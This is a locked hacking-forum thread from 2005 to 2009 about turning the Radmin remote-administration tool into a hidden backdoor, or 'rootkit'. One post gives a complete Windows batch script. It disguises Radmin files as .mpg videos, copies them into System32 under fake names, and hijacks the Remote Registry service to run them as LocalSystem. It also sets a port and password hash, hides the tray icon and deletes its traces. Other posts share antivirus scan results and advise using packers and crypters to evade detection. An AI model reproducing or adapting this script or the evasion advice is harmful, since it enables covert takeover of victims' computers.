Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Sponsored by: █ Sparkhost - Hosting Without Compromises! █ Hybrid Performance Web Hosting █ Spark Host Stream Hosting █ Hybrid IRC & IRCd Server Shell Accounts

Remote Desktop Rootkits

Started by Tyler , Jun 26 2005 12:30 PM

Prev

This topic is locked

37 replies to this topic

#31 Marts McFly

Second Lieutenant

Second Lieutenant
591 posts

Posted 29 April 2007 - 07:01 PM

Well ... nice rootkit ... really usefull ! But there is a Problem ...
AhnLab-V3 2007.4.28.0 04.27.2007 no virus found
AntiVir 7.4.0.15 04.28.2007 no virus found
Authentium 4.93.8 04.27.2007 no virus found
Avast 4.7.981.0 04.26.2007 no virus found
AVG 7.5.0.464 04.26.2007 Potentially harmful program RemoteAdmin.O
BitDefender 7.2 04.28.2007 no virus found
CAT-QuickHeal 9.00 04.27.2007 no virus found
ClamAV devel-20070416 04.28.2007 no virus found
DrWeb 4.33 04.28.2007 no virus found
eSafe 7.0.15.0 04.27.2007 no virus found
eTrust-Vet 30.7.3601 04.27.2007 no virus found
Ewido 4.0 04.27.2007 no virus found
FileAdvisor 1 04.28.2007 no virus found
Fortinet 2.85.0.0 04.28.2007 RAT/RAdmin
F-Prot 4.3.2.48 04.27.2007 W32/RemoteAdmin.A
F-Secure 6.70.13030.0 04.28.2007 Backdoor.Win32.RA-based.z
Ikarus T3.1.1.5 04.28.2007 not-a-virus:RemoteAdmin.Win32.RAdmin.21
Kaspersky 4.0.2.24 04.28.2007 not-a-virus:RemoteAdmin.Win32.RAdmin.21
McAfee 5019 04.27.2007 potentially unwanted program RemAdm-RemoteAdmin
Microsoft 1.2405 04.28.2007 RemoteAccess:Win32/RServer (threat-c)
NOD32v2 2225 04.27.2007 Win32/RemoteAdmin
Norman 5.80.02 04.27.2007 no virus found
Panda 9.0.0.4 04.28.2007 no virus found
Prevx1 V2 04.28.2007 no virus found
Sophos 4.16.0 04.23.2007 RemoteAdmin
Sunbelt 2.2.907.0 04.19.2007 no virus found
Symantec 10 04.28.2007 Remacc.Radmin
TheHacker 6.1.6.095 04.15.2007 no virus found
VBA32 3.11.4 04.28.2007 Backdoor.Win32.RA-based.v#1
VirusBuster 4.3.7:9 04.27.2007 Backdoor.Radmin.Y
Webwasher-Gateway 6.0.1 04.28.2007 Riskware.RemoteAdmin.R

maybe if you want you can make a Access Remote PC-rootkit

What do you expect? He posted this almost 2 years ago! I'm suprised more AV's didn't pick it up.

Certified Information Systems Security Professional (CISSP)

T: http://twitter.com/Marts_McFly

B: http://www.backtosecurity.com

Back to top

#32 loloko

Private

Members
11 posts

Posted 30 April 2007 - 07:27 AM

Well ... nice rootkit ... really usefull ! But there is a Problem ...
AhnLab-V3 2007.4.28.0 04.27.2007 no virus found
AntiVir 7.4.0.15 04.28.2007 no virus found
Authentium 4.93.8 04.27.2007 no virus found
Avast 4.7.981.0 04.26.2007 no virus found
AVG 7.5.0.464 04.26.2007 Potentially harmful program RemoteAdmin.O
BitDefender 7.2 04.28.2007 no virus found
CAT-QuickHeal 9.00 04.27.2007 no virus found
ClamAV devel-20070416 04.28.2007 no virus found
DrWeb 4.33 04.28.2007 no virus found
eSafe 7.0.15.0 04.27.2007 no virus found
eTrust-Vet 30.7.3601 04.27.2007 no virus found
Ewido 4.0 04.27.2007 no virus found
FileAdvisor 1 04.28.2007 no virus found
Fortinet 2.85.0.0 04.28.2007 RAT/RAdmin
F-Prot 4.3.2.48 04.27.2007 W32/RemoteAdmin.A
F-Secure 6.70.13030.0 04.28.2007 Backdoor.Win32.RA-based.z
Ikarus T3.1.1.5 04.28.2007 not-a-virus:RemoteAdmin.Win32.RAdmin.21
Kaspersky 4.0.2.24 04.28.2007 not-a-virus:RemoteAdmin.Win32.RAdmin.21
McAfee 5019 04.27.2007 potentially unwanted program RemAdm-RemoteAdmin
Microsoft 1.2405 04.28.2007 RemoteAccess:Win32/RServer (threat-c)
NOD32v2 2225 04.27.2007 Win32/RemoteAdmin
Norman 5.80.02 04.27.2007 no virus found
Panda 9.0.0.4 04.28.2007 no virus found
Prevx1 V2 04.28.2007 no virus found
Sophos 4.16.0 04.23.2007 RemoteAdmin
Sunbelt 2.2.907.0 04.19.2007 no virus found
Symantec 10 04.28.2007 Remacc.Radmin
TheHacker 6.1.6.095 04.15.2007 no virus found
VBA32 3.11.4 04.28.2007 Backdoor.Win32.RA-based.v#1
VirusBuster 4.3.7:9 04.27.2007 Backdoor.Radmin.Y
Webwasher-Gateway 6.0.1 04.28.2007 Riskware.RemoteAdmin.R

maybe if you want you can make a Access Remote PC-rootkit

What do you expect? He posted this almost 2 years ago! I'm suprised more AV's didn't pick it up.

Hello,

Radmin is a regular software, so all avs compagnies doesn't classified this tool as a "wild" backdoor.

Back to top

#33 dkollf

Private

Members
2 posts

Posted 16 June 2007 - 09:07 AM

See my batfile

---------------------------------------------------------------
@echo off
net stop r_server
net stop radmm
net stop PlugPlayExt
net stop RemoteRegistry
copy 1.mpg %windir%\System32\regsvcs.exe
copy 2.mpg %windir%\System32\raddrv.dll
copy 3.mpg %windir%\System32\AdmDll.dll
copy 4.mpg %windir%\System32\serv.exe
copy 5.mpg %windir%\System32\dtreg.exe
serv remove RemoteRegistry /y
serv.exe install RemoteRegistry /b:"%windir%\system32\regsvcs.exe /service" /n:"Remote Registry Service" /i:yes /u:LocalSystem /s:auto
dtreg.exe -Quiet -AddKey \HKLM\SYSTEM\RAdmin
dtreg.exe -Quiet -AddKey \HKLM\SYSTEM\RAdmin\v2.0
dtreg.exe -Quiet -AddKey \HKLM\SYSTEM\RAdmin\v2.0\Server
dtreg.exe -Quiet -AddKey \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters
dtreg.exe -Quiet -AddKey \HKLM\SOFTWARE\RAdmin
dtreg.exe -Quiet -AddKey \HKLM\SOFTWARE\RAdmin\v1.01
dtreg.exe -Quiet -AddKey \HKLM\SOFTWARE\RAdmin\v1.01\ViewType
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SOFTWARE\RAdmin\v1.01\ViewType\Data=01f699b0575c1380186ff3fc68838ebfca4a9c5eccf98e7c3172ae28315e990b9fa489
61fc0ce34750e30608f0552b80b3d4c0a8153627f05f8ef7b0f5b04bdb
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon=01000000
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port=35e40000
dtreg.exe -Quiet -Set REG_BINARY \HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter=1da3829a0bab2b4b1bd98142aa93136a
dtreg.exe -Quiet -Set REG_DWORD \HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=0x00000002
dtreg.exe -Quiet -Set REG_SZ \HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry\Description=Allow Remote Registry Contral。
echo Registry settings changed...
echo Starting Radmin Service now
net start RemoteRegistry
del %windir%\System32\*.mpg
del %windir%\System32\*.bat

Back to top

#34 xaiver

Private

Members
8 posts

Posted 06 June 2009 - 12:16 AM

is there anybody who can upload a modded radmin? where u only have to start a bat file and then t installs and you can connect then by radmin viewer im looking for that

Back to top

#35 squirl

Private First Class

Members
64 posts

Posted 06 June 2009 - 05:22 AM

omg read the first post... u got everything there...
read it and u can do it by rourself

Back to top

#36 AdmiralB

Specialist

Sergeant Major
337 posts

Posted 06 June 2009 - 08:05 PM

well regarding virus scans,

you can try to mask the rootkits with different packers crypters and morphing apps

Back to top

#37 GhostShell

Staff Sergeant

Members
345 posts

Posted 08 June 2009 - 07:37 AM

well regarding virus scans,

you can try to mask the rootkits with different packers crypters and morphing apps

Not only can you do that but radmin is very easy to modify, i modded everything in mine. And it never gets removed or caught ever. The RemoteRegistry mod batch file pasted above made me laugh I use similar tricks but what a lame service to chose. What admin would not stop that?

http://pcsubject.com/ <- My new Blog

"As a young boy, I was taught in high school that hacking was cool." -Kevin Mitnick

"It's easy to point and click programs, but thats not real hacking." -illwill

Back to top

#38 Ryan M

First Sergeant

Second Lieutenant
1,740 posts

Posted 08 June 2009 - 07:31 PM

Do not bump old topics. Closed.

There is no security on this earth. Only opportunity.
-Douglas MacArthur
GSO Compiled Exploit Database
----------------------------------------
[b]Mod at GovernmentSecurity